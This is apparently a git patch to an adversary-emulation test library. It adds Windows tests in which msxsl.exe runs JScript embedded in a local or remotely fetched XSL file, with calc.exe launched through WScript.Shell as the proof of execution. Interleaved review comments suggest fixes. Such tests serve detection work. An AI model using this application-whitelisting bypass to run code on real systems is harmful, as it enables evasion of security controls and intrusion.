From 03adb61ee49d5900b571dcaba7ddeb3291b51d1f Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 14 Sep 2018 20:35:48 -0500 Subject: [PATCH] Added remote test, simplified script file --- atomics/T1127/T1127.md | 42 ++++++++++++++++++++++++++++++ atomics/T1127/T1127.yaml | 27 ++++++++++++++++--- atomics/T1127/src/msxsl-script.xsl | 5 +--- atomics/index.md | 4 +++ atomics/windows-index.md | 4 +++ 5 files changed, 74 insertions(+), 8 deletions(-) diff --git a/atomics/T1127/T1127.md b/atomics/T1127/T1127.md index 527b2b34..5a8f0dd3 100644 --- a/atomics/T1127/T1127.md +++ b/atomics/T1127/T1127.md @@ -58,6 +58,10 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward - [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks) +- [Atomic Test #2 - MSXSL Bypass using local files](#atomic-test-2---msxsl-bypass-using-local-files) + +- [Atomic Test #3 - MSXSL Bypass using remote files](#atomic-test-3---msxsl-bypass-using-remote-files) +
@@ -77,3 +81,41 @@ Executes the code in a project file using. C# Example C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} ```
+
+
+## Atomic Test #2 - MSXSL Bypass using local files
+Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml|
+| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl|
+
+#### Run it with `command_prompt`!
+```
+C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
+```
+
+
+
+## Atomic Test #3 - MSXSL Bypass using remote files
+Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml|
+| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl|
+
+#### Run it with `command_prompt`!
+```
+C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
+```
+
diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 143a4617..96d51568 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml 
@@ -17,21 +17,40 @@ atomic_tests: command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} -- name: MSXSL Bypass +- name: MSXSL Bypass using local files description: | - Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft. + Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. supported_platforms: - windows input_arguments: xmlfile: - description: Location of the test XML file. May be a URL. + description: Location of the test XML file on the local filesystem. type: Path default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml xslfile: - description: Location of the test XSL script file. May be a URL. + description: Location of the test XSL script file on the local filesystem. type: Path default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl executor: name: command_prompt command: | C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} + +- name: MSXSL Bypass using remote files + description: | + Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. + supported_platforms: + - windows + input_arguments: + xmlfile: + description: Remote location (URL) of the test XML file. + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml + xslfile: + description: Remote location (URL) of the test XSL script file. + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl + executor: + name: command_prompt + command: | + C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} 
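Review bot: Both `default:` URLs of the new "MSXSL Bypass using remote files" test point at the `master` branch, so the stylesheet that msxsl.exe runs on the test host is whatever that branch holds at run time rather than the content reviewed in this commit. Pinning the defaults to a commit keeps the executed script fixed, e.g. `default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<COMMIT_SHA>/atomics/T1127/src/msxsl-script.xsl` (placeholder SHA), and likewise for `msxsl-xmlfile.xml`. Separately, both MSXSL tests hard-code `C:\Windows\Temp\msxsl.exe` in `command:` while the description only says MSXSL must be downloaded. Stating that expected path in the description, or making it an input argument, would avoid a run that fails without producing the telemetry the test is meant to generate.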
diff --git a/atomics/T1127/src/msxsl-script.xsl b/atomics/T1127/src/msxsl-script.xsl index 81949e27..0c41e651 100644 --- a/atomics/T1127/src/msxsl-script.xsl +++ b/atomics/T1127/src/msxsl-script.xsl @@ -5,10 +5,7 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> - function xml(nodelist) { -var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe"); - return nodelist.nextNode().xml; - } + var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe"); diff --git a/atomics/index.md b/atomics/index.md index c423c08e..2d3d48b7 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -262,6 +262,8 @@ - Atomic Test #3: Set a file's creation timestamp [linux, macos] - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #2: MSXSL Bypass using local files [windows] + - Atomic Test #3: MSXSL Bypass using remote files [windows] - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -495,6 +497,8 @@ - Atomic Test #1: Trap [macos, centos, ubuntu, linux] - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #2: MSXSL Bypass using local files [windows] + - Atomic Test #3: MSXSL Bypass using remote files [windows] - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1047 Windows Management Instrumentation](./T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] diff --git a/atomics/windows-index.md b/atomics/windows-index.md index e16c7ac8..049f9ead 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md 
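Review bot: The path in the `Run(...)` string uses single backslashes; if this block is parsed as a JScript string literal, `\W`, `\S` and `\c` are not recognised escapes and the backslash is dropped, so the command would not resolve to calc.exe and the test would not produce the process-creation event it is meant to exercise. Doubling them, `.Run("cmd.exe /c C:\\Windows\\System32\\calc.exe");`, keeps the literal path. The hunk also removes `function xml(nodelist)`, and the templates are outside the hunk, so it is worth confirming that nothing still calls `user:xml(...)`. A short comment noting that the statement now runs when the script block is loaded, not when a template calls it, would help readers.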
@@ -91,6 +91,8 @@ - [T1099 Timestomp](./T1099/T1099.md) - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #2: MSXSL Bypass using local files [windows] + - Atomic Test #3: MSXSL Bypass using remote files [windows] - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -408,6 +410,8 @@ - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #2: MSXSL Bypass using local files [windows] + - Atomic Test #3: MSXSL Bypass using remote files [windows] - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1047 Windows Management Instrumentation](./T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows]